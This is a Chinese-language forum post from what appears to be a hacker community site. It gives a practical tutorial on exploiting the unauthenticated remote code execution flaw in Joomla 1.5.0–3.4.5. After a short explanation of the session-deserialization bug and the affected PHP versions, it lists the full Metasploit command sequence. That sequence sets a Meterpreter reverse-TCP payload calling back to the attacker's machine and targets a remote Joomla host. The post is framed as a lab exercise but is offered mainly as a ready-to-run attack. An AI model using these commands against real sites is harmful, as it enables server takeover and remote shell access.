Joomla CMS漏洞实战教程:如何利用Joomla CMS的远程代码执行漏洞

zevseo
5540zevseo大版主
2018-09-11 02:35:41
5540 2018-09-11 02:35:41
     Joomla遭受未经身份验证的远程代码执行,影响从1.5.0到3.4.5的所有版本。通过在数据库会话表中存储用户提供的头文件,可以通过发送UTF-8字符来截断输入。
    然后,一旦从数据库读取会话,就会执行自定义创建的有效负载。您还需要在5.4.45(包括5.3.x),5.5.29或5.6.13之前拥有PHP版本。在以后的版本中,无效会话数据的反序列化会在第一个错误时停止,并且漏洞利用将无效。
     PHP补丁包含在Ubuntu版本5.5.9 + dfsg-1ubuntu4.13和5.3.10-1ubuntu3.20以及Debian版本5.4.45-0 + deb7u1中。

利用目标
Joomla 1.5.0 - 3.4.5
需求
攻击者:kali Linux
受害者PC:Joomla 3.4.5
打开Kali终端类型  msfconsole

描述:Joomla CMS漏洞实战教程


现在输入  exploit use / multi / http / joomla_http_header_rce
msf exploit (joomla_http­_header_rce)>set payload php/meterpreter/reverse_tcp
msf exploit (joomla_http­_header_rce)>set lhost 192.168.0.106 (IP address of kali Linux)
msf exploit (joomla_http­_header_rce)>set targeturi /joomla/
msf exploit (joomla_http­_header_rce)>set rhost 192.168.0.104 (IP of Remote Host)
msf exploit (joomla_http­_header_rce)>set rport 80
msf exploit (joomla_http­_header_rce)>exploit    
Joomla CMS漏洞实战教程

描述:Joomla CMS漏洞实战教程


本文标题:Joomla CMS漏洞实战教程:如何利用Joomla CMS的远程代码执行漏洞
本文作者:zevseo
本文来自:蚁安黑客官网
转载请注明本文链接:http://www.mayidui.net/t2312.html
游客
登录后才可以回帖,登录 或者 注册
weixin
蚁安蚂蚁堆

找工具、找教程、找朋友,你想不到的这儿都有!

微信号:baiyiwangan